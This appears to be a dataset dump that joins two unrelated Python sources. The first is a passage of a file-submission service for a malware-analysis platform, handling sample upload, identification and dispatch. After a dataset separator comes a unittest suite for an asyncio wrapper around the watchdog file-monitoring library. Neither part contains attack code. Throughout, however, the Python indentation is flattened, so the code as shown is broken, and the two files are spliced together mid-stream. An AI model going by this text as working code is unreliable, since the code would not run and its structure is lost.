@classmethod
def identify(cls, transport, storage, sha256, **kw):
""" Identify a file. """
assert_valid_sha256(sha256)
classification = kw['classification']
kw['ttl'] = ttl = effective_ttl(kw)
kw['__expiry_ts__'] = expiry = ttl_to_expiry(ttl)
# By the time identify is called, either the file was in our cache
        # and we refreshed its ttl or the client has successfully transferred
# the file to us.
local_path = transport.local_path(sha256)
if not local_path:
path = kw.get("path", None)
if path and os.path.exists(path):
local_path = path
if not transport.exists(sha256):
log.warning('File specified is not on server: %s %s.',
sha256, str(transport))
return None
temporary_path = fileinfo = None
try:
if not local_path:
temporary_path = tempfile.mktemp(prefix="submission.identify")
transport.download(sha256, temporary_path)
local_path = temporary_path
fileinfo = identify.fileinfo(local_path)
storage.save_or_freshen_file(sha256, fileinfo, expiry, classification)
finally:
if temporary_path:
try:
os.unlink(temporary_path)
except: # pylint: disable=W0702
pass
return fileinfo
@classmethod
def presubmit(cls, transport, sha256, **kw):
""" Execute a presubmit.
Checks if this file is already cached.
If not, it returns a location for the client to copy the file.
result dictionary example:
{ 'exists': False,
'sha256': u'012345678....9876543210',
'upload_path': u'/home/aluser/012345678....9876543210'
}
"""
log.debug("PRESUBMIT: %s", sha256)
assert_valid_sha256(sha256)
if transport.exists(sha256):
return SubmissionWrapper.result_dict(transport, sha256, True, None, kw)
# We don't have this file. Tell the client as much and tell it where
# to transfer the file before issuing the final submit.
log.debug('Cache miss. Client should transfer to %s', sha256)
return SubmissionWrapper.result_dict(transport, sha256, False, sha256, kw)
# noinspection PyBroadException
@classmethod
def submit(cls, transport, storage, sha256, path, priority, submitter, **kw):
""" Execute a submit.
Any kw are passed along in the dispatched request.
"""
assert_valid_sha256(sha256)
queue = forge.get_dispatch_queue()
classification = kw['classification']
kw['max_extracted'] = max_extracted(kw)
kw['max_supplementary'] = max_supplementary(kw)
kw['ttl'] = ttl = effective_ttl(kw)
kw['__expiry_ts__'] = expiry = ttl_to_expiry(ttl)
# By the time submit is called, either the file was in our cache
        # and we refreshed its ttl or the client has successfully transferred
# the file to us.
local_path = transport.local_path(sha256)
if not transport.exists(sha256):
raise SubmissionException('File specified is not on server: %s %s.' % (sha256, str(transport)))
root_sha256 = sha256
temporary_path = massaged_path = None
try:
if not local_path:
temporary_path = tempfile.mktemp(prefix="submission.submit")
transport.download(sha256, temporary_path)
local_path = temporary_path
fileinfo = identify.fileinfo(local_path)
if fileinfo['sha256'] != sha256:
raise CorruptedFileStoreException('SHA256 mismatch between received '
'and calculated sha256. %s != %s' % (sha256, fileinfo['sha256']))
storage.save_or_freshen_file(sha256, fileinfo, expiry, classification)
decode_file = forge.get_decode_file()
massaged_path, _, fileinfo, al_meta = decode_file(local_path, fileinfo)
if massaged_path:
local_path = massaged_path
sha256 = fileinfo['sha256']
transport.put(local_path, sha256)
storage.save_or_freshen_file(sha256, fileinfo, expiry, classification)
ignore_size = kw.get('ignore_size', False)
max_size = config.submissions.max.size
if fileinfo['size'] > max_size and not ignore_size:
msg = "File too large (%d > %d). Submission failed" % (fileinfo['size'], max_size)
raise SubmissionException(msg)
# We'll just merge the mandatory arguments, fileinfo, and any
# optional kw and pass those all on to the dispatch callback.
task_args = fileinfo
task_args.update(kw)
task_args.update({
'original_selected': kw.get('selected', []),
'root_sha256': root_sha256,
'srl': sha256,
'sha256': sha256,
'priority': priority,
'submitter': submitter,
'path': safe_str(path)})
if 'metadata' in task_args:
task_args['metadata'].update(al_meta)
else:
task_args['metadata'] = al_meta
submit_task = Task.create(**task_args)
if submit_task.is_initial():
storage.create_submission(
submit_task.sid,
submit_task.as_submission_record(),
[(os.path.basename(path), submit_task.srl)])
log.debug("Submission complete. Dispatching: %s", submit_task)
queue.send(submit_task, shards=SHARDS)
return submit_task.raw
finally:
if massaged_path:
try:
os.unlink(massaged_path)
except: # pylint:disable=W0702
pass
if temporary_path:
try:
os.unlink(temporary_path)
except: # pylint:disable=W0702
pass
@classmethod
def submit_inline(cls, storage, transport, file_paths, **kw):
""" Submit local samples to the submission service.
submit_inline can be used when the sample to submit is already
        local to the submission service. It does the presubmit, filestore
upload and submit.
Any kw are passed to the Task created to dispatch this submission.
"""
classification = kw['classification']
kw['max_extracted'] = max_extracted(kw)
kw['max_supplementary'] = max_supplementary(kw)
kw['ttl'] = ttl = effective_ttl(kw)
kw['__expiry_ts__'] = expiry = ttl_to_expiry(ttl)
submissions = []
file_tuples = []
dispatch_request = None
# Generate static fileinfo data for each file.
for file_path in file_paths:
file_name = os.path.basename(file_path)
fileinfo = identify.fileinfo(file_path)
ignore_size = kw.get('ignore_size', False)
max_size = config.submissions.max.size
if fileinfo['size'] > max_size and not ignore_size:
msg = "File too large (%d > %d). Submission Failed" % \
(fileinfo['size'], max_size)
raise SubmissionException(msg)
decode_file = forge.get_decode_file()
temp_path, original_name, fileinfo, al_meta = \
decode_file(file_path, fileinfo)
if temp_path:
file_path = temp_path
if not original_name:
original_name = os.path.splitext(file_name)[0]
file_name = original_name
sha256 = fileinfo['sha256']
storage.save_or_freshen_file(sha256, fileinfo, expiry, classification)
file_tuples.append((file_name, sha256))
if not transport.exists(sha256):
log.debug('File not on remote filestore. Uploading %s', sha256)
transport.put(file_path, sha256, location='near')
if temp_path:
os.remove(temp_path)
# We'll just merge the mandatory arguments, fileinfo, and any
# optional kw and pass those all on to the dispatch callback.
task_args = fileinfo
task_args['priority'] = 0 # Just a default.
task_args.update(kw)
task_args['srl'] = sha256
task_args['original_filename'] = file_name
task_args['path'] = file_name
if 'metadata' in task_args:
task_args['metadata'].update(al_meta)
else:
task_args['metadata'] = al_meta
dispatch_request = Task.create(**task_args)
submissions.append(dispatch_request)
storage.create_submission(
dispatch_request.sid,
dispatch_request.as_submission_record(),
file_tuples)
dispatch_queue = forge.get_dispatch_queue()
for submission in submissions:
dispatch_queue.submit(submission)
log.debug("Submission complete. Dispatched: %s", dispatch_request)
# Ugly - fighting with task to give UI something that makes sense.
file_result_tuples = \
zip(file_paths, [dispatch_request.raw for dispatch_request in submissions])
result = submissions[0].raw.copy()
fileinfos = []
for filename, result in file_result_tuples:
finfo = result['fileinfo']
finfo['original_filename'] = os.path.basename(filename)
finfo['path'] = finfo['original_filename']
fileinfos.append(finfo)
result['fileinfo'] = fileinfos
return result
# noinspection PyBroadException
@classmethod
def submit_multi(cls, storage, transport, files, **kw):
""" Submit all files into one submission
submit_multi can be used when all the files are already present in the
file storage.
files is an array of (name, sha256) tuples
Any kw are passed to the Task created to dispatch this submission.
"""
sid = str(uuid.uuid4())
classification = kw['classification']
kw['max_extracted'] = max_extracted(kw)
kw['max_supplementary'] = max_supplementary(kw)
kw['ttl'] = ttl = effective_ttl(kw)
kw['__expiry_ts__'] = expiry = ttl_to_expiry(ttl)
submissions = []
temporary_path = None
dispatch_request = None
# Generate static fileinfo data for each file.
for name, sha256 in files:
local_path = transport.local_path(sha256)
if not transport.exists(sha256):
raise SubmissionException('File specified is not on server: %s %s.' % (sha256, str(transport)))
try:
if not local_path:
temporary_path = tempfile.mktemp(prefix="submission.submit_multi")
transport.download(sha256, temporary_path)
local_path = temporary_path
fileinfo = identify.fileinfo(local_path)
storage.save_or_freshen_file(sha256, fileinfo, expiry, classification)
decode_file = forge.get_decode_file()
massaged_path, new_name, fileinfo, al_meta = \
decode_file(local_path, fileinfo)
if massaged_path:
name = new_name
local_path = massaged_path
sha256 = fileinfo['sha256']
if not transport.exists(sha256):
transport.put(local_path, sha256)
storage.save_or_freshen_file(sha256, fileinfo, expiry, classification)
ignore_size = kw.get('ignore_size', False)
max_size = config.submissions.max.size
if fileinfo['size'] > max_size and not ignore_size:
msg = "File too large (%d > %d). Submission failed" % (fileinfo['size'], max_size)
raise SubmissionException(msg)
# We'll just merge the mandatory arguments, fileinfo, and any
# optional kw and pass those all on to the dispatch callback.
task_args = fileinfo
task_args['priority'] = 0 # Just a default.
task_args.update(kw)
task_args['srl'] = sha256
task_args['original_filename'] = name
task_args['sid'] = sid
task_args['path'] = name
if 'metadata' in task_args:
task_args['metadata'].update(al_meta)
else:
task_args['metadata'] = al_meta
dispatch_request = Task.create(**task_args)
submissions.append(dispatch_request)
finally:
if temporary_path:
try:
os.unlink(temporary_path)
except: # pylint: disable=W0702
pass
storage.create_submission(
dispatch_request.sid,
dispatch_request.as_submission_record(),
files)
dispatch_queue = forge.get_dispatch_queue()
for submission in submissions:
dispatch_queue.submit(submission)
log.debug("Submission complete. Dispatched: %s", dispatch_request)
return submissions[0].raw.copy()
@classmethod
def watch(cls, sid, watch_queue):
t = Task.watch(**{
'priority': config.submissions.max.priority,
'sid': sid,
'watch_queue': watch_queue,
})
n = forge.determine_dispatcher(sid)
forge.get_control_queue('control-queue-' + str(n)).push(t.raw)
@classmethod
def result_dict(cls, transport, sha256, exists, upload_path, kw):
return {
'exists': exists,
'upload_path': upload_path,
'filestore': str(transport),
'sha256': sha256,
'kwargs': kw,
}
class SubmissionService(object):
def __init__(self):
self.storage = forge.get_datastore()
self.transport = forge.get_filestore()
log.info("Submission service instantiated. Transport::{0}".format(
self.transport))
def check_exists(self, sha256_list):
return SubmissionWrapper.check_exists(self.transport, sha256_list)
def identify(self, sha256, **kw):
return SubmissionWrapper.identify(self.transport, self.storage, sha256, **kw)
def presubmit(self, sha256, **kw):
return SubmissionWrapper.presubmit(self.transport, sha256, **kw)
def submit(self, sha256, path, priority, submitter, **kw):
return SubmissionWrapper.submit(self.transport, self.storage, sha256, path, priority, submitter, **kw)
def submit_inline(self, file_paths, **kw):
return SubmissionWrapper.submit_inline(self.storage, self.transport, file_paths, **kw)
def submit_multi(self, files, **kw):
return SubmissionWrapper.submit_multi(self.storage, self.transport, files, **kw)
@classmethod
def watch(cls, sid, watch_queue):
return SubmissionWrapper.watch(sid, watch_queue)
def result_dict(self, sha256, exists, upload_path, kw):
# noinspection PyProtectedMember
return SubmissionWrapper.result_dict(self.transport, sha256, exists, upload_path, kw)
class SubmissionClient(object):
def __init__(self, server_url=None, datastore=None):
if not server_url:
server_url = config.submissions.url
self.server_url = server_url
self.transport = forge.get_filestore()
self.datastore = datastore
self.is_unix = os.name == "posix"
if not self.is_unix:
from assemblyline_client import Client
self.client = Client(self.server_url, auth=SUBMISSION_AUTH)
elif self.datastore is None:
self.datastore = forge.get_datastore()
def check_srls(self, srl_list):
if self.is_unix:
return self._check_srls_unix(srl_list)
else:
return self._check_srls_windows(srl_list)
def _check_srls_unix(self, srl_list):
if not srl_list:
return True
result = SubmissionWrapper.check_exists(self.transport, srl_list)
return len(result.get('existing', [])) == len(srl_list)
def _check_srls_windows(self, srl_list):
if not srl_list:
return True
result = self.client.submit.checkexists(*srl_list)
return len(result.get('existing', [])) == len(srl_list)
def identify_supplementary(self, rd, **kw):
# Pass along all parameters as query arguments.
submits = {k: dict(kw.items() + v.items()) for k, v in rd.iteritems()}
if self.is_unix:
return self._identify_supplementary_unix(submits)
else:
return self._identify_supplementary_windows(submits)
def _identify_supplementary_unix(self, submits):
submit_results = {}
for key, submit in submits.iteritems():
file_info = SubmissionWrapper.identify(self.transport, self.datastore, **submit)
if file_info:
submit_result = {"status": "succeeded", "fileinfo": file_info}
else:
submit_result = {"status": "failed", "fileinfo": {}}
submit_results[key] = submit_result
return submit_results
def _identify_supplementary_windows(self, submits):
return self.client.submit.identify(submits)
def presubmit_local_files(self, file_paths, **kw):
default_error = {'succeeded': False, 'error': 'Unknown Error'}
presubmit_requests = {}
presubmit_results = {}
ignore_size = kw.get('ignore_size', False)
max_size = config.submissions.max.size
# Prepare the batch presubmit.
rid_map = {}
for rid, local_path in enumerate(file_paths):
rid = str(rid)
rid_map[rid] = local_path
try:
assert_valid_file(local_path)
d = digests.get_digests_for_file(local_path,
calculate_entropy=False)
if d['size'] > max_size and not ignore_size:
presubmit_results[rid] = {
'succeeded': False,
'error': 'file too large (%d > %d). Skipping' % (d['size'], max_size),
}
continue
presubmit_requests[rid] = d
# Set a default error. Overwritten on success.
presubmit_results[rid] = default_error.copy()
except Exception as ex: # pylint: disable=W0703
log.error("Exception processing local file: %s. Skipping", ex)
presubmit_results[rid] = {
'succeeded': False,
'error': 'local failure before presubmit: {0}'.format(ex),
}
continue
if self.is_unix:
presubmit_results = self._presubmit_local_files_unix(presubmit_requests, presubmit_results)
else:
presubmit_results = self._presubmit_local_files_windows(presubmit_requests, presubmit_results)
if len(presubmit_results) != len(file_paths):
log.error('Problem submitting %s: %s',
pprint.pformat(file_paths),
pprint.pformat(presubmit_results))
# noinspection PyUnresolvedReferences
for rid, result in presubmit_results.iteritems():
result['path'] = rid_map[rid]
return presubmit_results
def _presubmit_local_files_unix(self, presubmit_requests, presubmit_results):
for key, presubmit in presubmit_requests.iteritems():
succeeded = True
presubmit_result = {}
try:
presubmit_result = SubmissionWrapper.presubmit(self.transport, **presubmit)
except Exception as e: # pylint: disable=W0703
succeeded = False
msg = 'Failed to presubmit for {0}:{1}'.format(key, e)
presubmit_result['error'] = msg
presubmit_result['succeeded'] = succeeded
presubmit_results[key] = presubmit_result
return presubmit_results
def _presubmit_local_files_windows(self, presubmit_requests, presubmit_results):
presubmit_results.update(self.client.submit.presubmit(presubmit_requests))
return presubmit_results
def submit_existing_file(self, path, **kw):
request = {
0: {
'path': safe_str(path),
'sha256': kw['sha256'],
}
}
return self.submit_requests(request, **kw)
def submit_local_files(self, file_requests, **kw):
results = {}
file_paths = [
file_requests[k]['path'] for k in sorted(file_requests.keys(), key=int)
]
successful, errors = \
self.transfer_local_files(file_paths, location='near', **kw)
for k in successful.keys():
req = file_requests.get(k, {})
display_name = req.pop('display_name')
req['path'] = display_name
ret = successful[k]
ret.update(req)
            # This prevents a badly written service from resubmitting the file originally submitted
if successful[k].get('sha256', None) == kw.get('psrl', None):
path = successful[k]['path']
errors[k] = {
'succeeded': False,
'path': path,
'error': "File submission was aborted for file '%s' because it the same as its parent." % path
}
log.warning("Service is trying to submit the parent file as an extracted file.")
del successful[k]
elif req.get('submission_tag') is not None:
# Save off any submission tags
st_name = "st/%s/%s" % (kw.get('psrl', None), successful[k].get('sha256', None))
eh = ExpiringHash(st_name, ttl=7200)
for st_name, st_val in req['submission_tag'].iteritems():
eh.add(st_name, st_val)
# Send the submit requests.
if successful:
results = self.submit_requests(successful, **kw)
else:
log.warn('Nothing to submit after presubmission processing.')
results.update(errors)
return results
def submit_requests(self, rd, **kw):
# Pass along all parameters as query arguments.
submits = {k: dict(kw.items() + v.items()) for k, v in rd.iteritems()}
if self.is_unix:
return self._submit_requests_unix(submits)
else:
return self._submit_requests_windows(submits)
def _submit_requests_unix(self, submits):
submit_results = {}
for key, submit in submits.iteritems():
path = submit.get('path', './path/missing')
if 'description' not in submit:
submit['description'] = "Inspection of file: %s" % path
submit_result = SubmissionWrapper.submit(self.transport, self.datastore, **submit)
submit_results[key] = submit_result
return submit_results
def _submit_requests_windows(self, submits):
return self.client.submit.start(submits)
def submit_supplementary_files(self, file_requests, location='far', **kw):
results = {}
file_paths = [
file_requests[k]['path'] for k in sorted(file_requests.keys(), key=int)
]
successful, errors = \
self.transfer_local_files(file_paths, location=location, **kw)
for k in successful.keys():
req = file_requests.get(k, {})
ret = successful[k]
ret.update(req)
            # This prevents a badly written service from resubmitting the file originally submitted
if successful[k].get('sha256', None) == kw.get('psrl', None):
path = successful[k]['path']
errors[k] = {
'succeeded': False,
'path': path,
'error': "File submission was aborted for file '%s' because it the same as its parent." % path
}
log.warning("Service is trying to submit the parent file as a supplementary file.")
del successful[k]
# Send the submit requests.
if successful:
results = self.identify_supplementary(successful, **kw)
else:
log.warn('Nothing to submit after presubmission processing.')
results.update(errors)
return results
def transfer_local_files(self, file_paths, location='all', **kw):
errors = {}
successful = {}
transfer_requests = self.presubmit_local_files(file_paths, **kw)
delete = []
# noinspection PyUnresolvedReferences
for rid, result in transfer_requests.iteritems():
key = result['path']
if key not in file_paths:
log.error("Unexpected presubmit result for %s.", key)
delete.append(key)
continue
if not result['succeeded']:
log.warn('skipping failed presubmit for %s - %s', key, result)
errors[rid] = {
'succeeded': False,
'path': safe_str(key),
'error': 'Presubmit failed: {0}'.format(result.get('error', 'Unknown Error')),
}
continue
for rid in delete:
# noinspection PyUnresolvedReferences
del transfer_requests[rid]
# Process presubmit results. Start building the submit requests. Keep
# note of all files we need to transfer to server.
files_to_transfer = []
# noinspection PyUnresolvedReferences
for rid, result in transfer_requests.iteritems():
key = result['path']
# If the file doesn't exist in filestore, let the client know they
# need to submit
if not result.get('succeeded', True):
continue
elif not result.get('exists'):
upload_path = result.get('upload_path')
log.debug('File not on server. Should copy %s -> %s using %s',
key, upload_path, str(self.transport))
files_to_transfer.append((key, upload_path))
else:
log.debug('File is already on server.')
# First apply the defaults
successful[rid] = {'path': safe_str(key), 'sha256': result['sha256']}
# Transfer any files which the server has indicated it doesn't have.
if files_to_transfer:
start = time.time()
log.debug("Transfering files %s", str(files_to_transfer))
failed_transfers = \
self.transport.put_batch(files_to_transfer, location=location)
if failed_transfers:
log.error("The following files failed to transfer: %s",
failed_transfers)
end = time.time()
log.debug("Transfered %s in %s.", len(files_to_transfer),
(end - start))
else:
log.debug("NO FILES TO TRANSFER.")
return successful, errors
| StarcoderdataPython |
1961426 | <reponame>BoniLindsley/phile
#!/usr/bin/env python3
# Standard library.
import asyncio
import collections.abc
import functools
import pathlib
import queue
import typing
import unittest
import unittest.mock
# External dependencies.
import watchdog.events
import watchdog.observers
# Internal packages.
import phile.asyncio
import phile.asyncio.pubsub
import phile.unittest
import phile.watchdog.asyncio
import phile.watchdog.observers
_T = typing.TypeVar('_T')
class StartFailed(Exception):
pass
class TestEventView(unittest.IsolatedAsyncioTestCase):
def __init__(self, *args: typing.Any, **kwargs: typing.Any) -> None:
super().__init__(*args, **kwargs)
self.called: asyncio.Event
self.event_view: phile.watchdog.asyncio.EventView
self.next_node: (
phile.asyncio.pubsub.Node[watchdog.events.FileSystemEvent]
)
async def asyncSetUp(self) -> None:
await super().asyncSetUp()
self.called = called = asyncio.Event()
self.next_node = (
phile.asyncio.pubsub.Node[watchdog.events.FileSystemEvent]()
)
self.event_view = phile.watchdog.asyncio.EventView(
next_node=self.next_node
)
async def aclose() -> None:
called.set()
self.event_view.aclose_callback = aclose
async def test_aclose__calls_given_callable(self) -> None:
self.assertFalse(self.called.is_set())
await phile.asyncio.wait_for(self.event_view.aclose())
self.assertTrue(self.called.is_set())
async def test_aclose__is_idempotent(self) -> None:
self.assertFalse(self.called.is_set())
await phile.asyncio.wait_for(self.event_view.aclose())
self.assertTrue(self.called.is_set())
self.called.clear()
await phile.asyncio.wait_for(self.event_view.aclose())
self.assertFalse(self.called.is_set())
async def test_aexit___calls_aclose(self) -> None:
async with self.event_view:
pass
self.assertTrue(self.called.is_set())
class TestEventQueue(unittest.IsolatedAsyncioTestCase):
async def test_put__puts_event(self) -> None:
event_queue = phile.watchdog.asyncio.EventQueue()
view = event_queue.__aiter__()
expected_event = watchdog.events.FileCreatedEvent('')
event_queue.put(
event_data=(
expected_event,
watchdog.observers.api.ObservedWatch('', False)
)
)
event = await phile.asyncio.wait_for(view.__anext__())
self.assertEqual(event, expected_event)
class EventEmitterMock:
def __init__( # pylint: disable=keyword-arg-before-vararg
self,
event_queue: watchdog.observers.api.EventQueue,
watch: watchdog.observers.api.ObservedWatch,
timeout: float = 1,
*args: typing.Any,
source_events: collections.abc.Iterable[
watchdog.events.FileSystemEvent] = [],
**kwargs: typing.Any
) -> None:
# TODO[mypy issue 4001]: Remove type ignore.
super().__init__(*args, **kwargs) # type: ignore[call-arg]
self._event_queue = event_queue
self._loop = asyncio.get_running_loop()
self._source_events = (
queue.SimpleQueue[watchdog.events.FileSystemEvent]()
)
self._started = False
self._stopped = False
self._stopped_event = asyncio.Event()
self.watch = watch
self.timeout = timeout
if source_events is not None:
for event in source_events:
self._source_events.put_nowait(event)
@classmethod
def create_emitter_class(
cls,
source_events: collections.abc.Iterable[
watchdog.events.FileSystemEvent],
) -> collections.abc.Callable[[
watchdog.observers.api.EventQueue,
watchdog.observers.api.ObservedWatch,
float,
], phile.watchdog.asyncio.EventEmitter]:
return functools.partial( # type: ignore[return-value]
cls, source_events=source_events
)
def queue_event(
self, event: watchdog.events.FileSystemEvent
) -> None:
if self._stopped:
raise RuntimeError
if self._started:
self._event_queue.put((event, self.watch))
else:
self._source_events.put_nowait(event)
def start(self) -> None:
self._started = True
try:
while True:
self.queue_event(self._source_events.get_nowait())
except queue.Empty:
pass
def stop(self) -> None:
self._stopped = True
self._loop.call_soon_threadsafe(self._stopped_event.set)
def is_alive(self) -> bool:
return self._started and not self._stopped
async def async_join(self) -> None:
await self._stopped_event.wait()
class TestEventEmitterMock(
phile.unittest.UsesTemporaryDirectory,
unittest.IsolatedAsyncioTestCase,
):
def __init__(self, *args: typing.Any, **kwargs: typing.Any) -> None:
super().__init__(*args, **kwargs)
self.emitter: EventEmitterMock
self.event_queue: watchdog.observers.api.EventQueue
self.expected_event: watchdog.events.FileSystemEvent
self.watch: watchdog.observers.api.ObservedWatch
async def asyncSetUp(self) -> None:
await super().asyncSetUp()
self.event_queue = watchdog.observers.api.EventQueue()
self.watch = watchdog.observers.api.ObservedWatch(
str(self.temporary_directory), False
)
self.emitter = EventEmitterMock(self.event_queue, self.watch)
self.expected_event = watchdog.events.FileCreatedEvent(
str(self.temporary_directory)
)
async def test_is_alive__is_false_by_default(self) -> None:
self.assertFalse(self.emitter.is_alive())
async def test_start__makes_is_alive(self) -> None:
self.emitter.start()
self.assertTrue(self.emitter.is_alive())
async def test_stop__makes_not_is_alive(self) -> None:
self.emitter.start()
self.emitter.stop()
self.assertFalse(self.emitter.is_alive())
async def test_async_join__after_stop(self) -> None:
self.emitter.start()
self.emitter.stop()
await phile.asyncio.wait_for(self.emitter.async_join())
async def test_queue_event__puts_events_into_queue(self) -> None:
self.emitter.start()
self.emitter.queue_event(self.expected_event)
received_event = self.event_queue.get_nowait()
self.assertEqual(
received_event, (self.expected_event, self.watch)
)
async def test_queue_event__does_not__queue_if_not_started(
self
) -> None:
self.emitter.queue_event(self.expected_event)
self.assertTrue(self.event_queue.empty())
async def test_queue_event__raises_if_stopped(self) -> None:
self.emitter.start()
self.emitter.stop()
with self.assertRaises(RuntimeError):
self.emitter.queue_event(self.expected_event)
async def test_start__queue_events_if_any(self) -> None:
self.emitter.queue_event(self.expected_event)
self.emitter.start()
received_event = self.event_queue.get_nowait()
self.assertEqual(
received_event, (self.expected_event, self.watch)
)
async def test_create_emitter_class__pre_queue_events(self) -> None:
# It acts as a class.
Emitter = ( # pylint: disable=invalid-name
EventEmitterMock.create_emitter_class(
source_events=(self.expected_event, )
)
)
emitter = Emitter(self.event_queue, self.watch, 1)
self.assertTrue(self.event_queue.empty())
emitter.start()
received_event = self.event_queue.get_nowait()
self.assertEqual(
received_event, (self.expected_event, self.watch)
)
class TestBaseObserver(
phile.unittest.UsesTemporaryDirectory,
unittest.IsolatedAsyncioTestCase,
):
def __init__(self, *args: typing.Any, **kwargs: typing.Any) -> None:
super().__init__(*args, **kwargs)
self.event_emitter_class_mock: unittest.mock.Mock
self.observer: phile.watchdog.asyncio.BaseObserver
async def asyncSetUp(self) -> None:
await super().asyncSetUp()
emitter_patcher = unittest.mock.patch(
'phile.watchdog.asyncio.EventEmitter',
autospec=True,
)
self.event_emitter_class_mock = emitter_patcher.start()
self.addCleanup(emitter_patcher.stop)
self.observer = phile.watchdog.asyncio.BaseObserver(
emitter_class=self.event_emitter_class_mock,
)
def test_has_expected_attributes(self) -> None:
self.assertEqual(
self.observer.timeout,
watchdog.observers.api.DEFAULT_OBSERVER_TIMEOUT
)
async def test_schedule_starts_and_unschedule_stops_emitter(
self
) -> None:
emitter_mock = self.event_emitter_class_mock.return_value
emitter_mock.is_alive.return_value = False
await phile.asyncio.wait_for(
self.observer.schedule(self.temporary_directory)
)
try:
emitter_mock.start.assert_called_once()
emitter_mock.is_alive.return_value = True
finally:
await phile.asyncio.wait_for(
self.observer.unschedule(self.temporary_directory)
)
emitter_mock.stop.assert_called_once()
async def test_schedule_returns_queue_and_unschedule_stops_it(
self
) -> None:
event_view = await phile.asyncio.wait_for(
self.observer.schedule(self.temporary_directory)
)
try:
self.assertIsInstance(
event_view, phile.watchdog.asyncio.EventView
)
finally:
await phile.asyncio.wait_for(
self.observer.unschedule(self.temporary_directory),
)
with self.assertRaises(StopAsyncIteration):
await phile.asyncio.wait_for(event_view.__anext__())
async def test_schedule__returns_cm_that_starts_and_stops_emitter(
self
) -> None:
emitter_mock = self.event_emitter_class_mock.return_value
async with await phile.asyncio.wait_for(
self.observer.schedule(self.temporary_directory)
):
emitter_mock.start.assert_called_once()
emitter_mock.stop.assert_called_once()
async def test_schedule__returns_view_ending_on_exit(self) -> None:
async with await phile.asyncio.wait_for(
self.observer.schedule(self.temporary_directory)
) as event_view:
self.assertIsInstance(
event_view, phile.watchdog.asyncio.EventView
)
with self.assertRaises(StopAsyncIteration):
await phile.asyncio.wait_for(event_view.__anext__())
async def test_schedule_not_stopping_if_start_fails(self) -> None:
emitter_mock = self.event_emitter_class_mock.return_value
emitter_mock.is_alive.return_value = False
emitter_mock.start.side_effect = StartFailed
with self.assertRaises(StartFailed):
await phile.asyncio.wait_for(
self.observer.schedule(self.temporary_directory)
)
emitter_mock.stop.assert_not_called()
async def test_schedule_not_stopping_queue_if_start_fails(
self
) -> None:
# Cannot really ensure it is not called.
# Test for coverage.
queue_patcher = unittest.mock.patch(
'phile.watchdog.asyncio.EventQueue',
autospec=True,
)
event_queue_class_mock = queue_patcher.start()
self.addCleanup(queue_patcher.stop)
event_queue_class_mock.side_effect = StartFailed
# The mocking has to be done before the observer is created
# because the mocked class is used in the constructor.
self.observer = phile.watchdog.asyncio.BaseObserver(
emitter_class=self.event_emitter_class_mock,
)
emitter_mock = self.event_emitter_class_mock.return_value
emitter_mock.is_alive.return_value = False
with self.assertRaises(StartFailed):
await phile.asyncio.wait_for(
self.observer.schedule(self.temporary_directory)
)
emitter_mock.stop.assert_not_called()
event_queue_class_mock.return_value.put_done.assert_not_called()
async def test_schedule_can_be_stacked(self) -> None:
emitter_mock = self.event_emitter_class_mock.return_value
async with await phile.asyncio.wait_for(
self.observer.schedule(self.temporary_directory)
) as event_view:
async with await phile.asyncio.wait_for(
self.observer.schedule(self.temporary_directory)
) as another_view:
self.assertIs(
# pylint: disable=protected-access
another_view._next_node,
event_view._next_node,
)
emitter_mock.stop.assert_not_called()
emitter_mock.stop.assert_called_once()
class TestObserver(
phile.unittest.UsesTemporaryDirectory,
unittest.IsolatedAsyncioTestCase,
):
def __init__(self, *args: typing.Any, **kwargs: typing.Any) -> None:
super().__init__(*args, **kwargs)
self.observer: phile.watchdog.asyncio.Observer
async def asyncSetUp(self) -> None:
await super().asyncSetUp()
self.observer = phile.watchdog.asyncio.Observer()
async def test_is_base_observer(self) -> None:
self.assertIsInstance(
self.observer,
phile.watchdog.asyncio.BaseObserver,
)
async def test_detects_create_event(self) -> None:
async with await phile.asyncio.wait_for(
self.observer.schedule(self.temporary_directory)
) as event_view:
file_path = self.temporary_directory / 'touched.txt'
file_path.touch()
event = await phile.asyncio.wait_for(event_view.__anext__())
self.assertEqual(
event,
watchdog.events.FileCreatedEvent(str(file_path)),
)
class UsesObserver(unittest.IsolatedAsyncioTestCase):
def __init__(self, *args: typing.Any, **kwargs: typing.Any) -> None:
self.observer: phile.watchdog.asyncio.BaseObserver
super().__init__(*args, **kwargs)
async def asyncSetUp(self) -> None:
await super().asyncSetUp()
self.observer = phile.watchdog.asyncio.Observer()
async def assert_watchdog_emits(
self,
source_view: (
phile.asyncio.pubsub.View[watchdog.events.FileSystemEvent]
),
expected_event: watchdog.events.FileSystemEvent,
) -> None:
received_events: list[watchdog.events.FileSystemEvent] = []
async def run() -> None:
async for event in source_view:
if event == expected_event:
return
received_events.append(event)
try:
await phile.asyncio.wait_for(run())
except BaseException as error:
message = (
'{expected_event} not found.\n'
'Received: {received_events}'.format(
expected_event=expected_event,
received_events=received_events,
)
)
raise self.failureException(message) from error
async def schedule_watchdog_observer(
self, path: pathlib.Path
) -> phile.watchdog.asyncio.EventView:
event_view = await phile.asyncio.wait_for(
self.observer.schedule(path)
)
self.addAsyncCleanup(event_view.aclose)
return event_view
class TestSplitFileMoveEvent(
phile.unittest.UsesTemporaryDirectory, unittest.TestCase
):
def test_ignores_directory_event(self) -> None:
event_path = (self.temporary_directory / 'something.file')
source_event = watchdog.events.DirCreatedEvent(str(event_path))
self.assertEqual(
phile.watchdog.asyncio.split_file_move_event(source_event),
tuple(),
)
def test_returns_src_path_of_non_move_file_event(self) -> None:
event_path = (self.temporary_directory / 'something.file')
source_event = watchdog.events.FileCreatedEvent(str(event_path))
self.assertEqual(
phile.watchdog.asyncio.split_file_move_event(source_event),
(source_event, ),
)
def test_returns_src_and_dest_paths_of_move_file_event(self) -> None:
event_path = (self.temporary_directory / 'something.file')
target_path = (self.temporary_directory / 'something.file_2')
source_event = watchdog.events.FileMovedEvent(
str(event_path), str(target_path)
)
self.assertEqual(
phile.watchdog.asyncio.split_file_move_event(source_event),
(
watchdog.events.FileDeletedEvent(str(event_path)),
watchdog.events.FileCreatedEvent(str(target_path)),
),
)
class TestEventToFilePaths(
phile.unittest.UsesTemporaryDirectory, unittest.TestCase
):
def test_ignores_directory_event(self) -> None:
event_path = (self.temporary_directory / 'something.file')
source_event = watchdog.events.DirCreatedEvent(str(event_path))
self.assertEqual(
phile.watchdog.asyncio.event_to_file_paths(source_event),
tuple(),
)
def test_returns_src_path_of_non_move_file_event(self) -> None:
event_path = (self.temporary_directory / 'something.file')
source_event = watchdog.events.FileCreatedEvent(str(event_path))
self.assertEqual(
phile.watchdog.asyncio.event_to_file_paths(source_event),
(event_path, ),
)
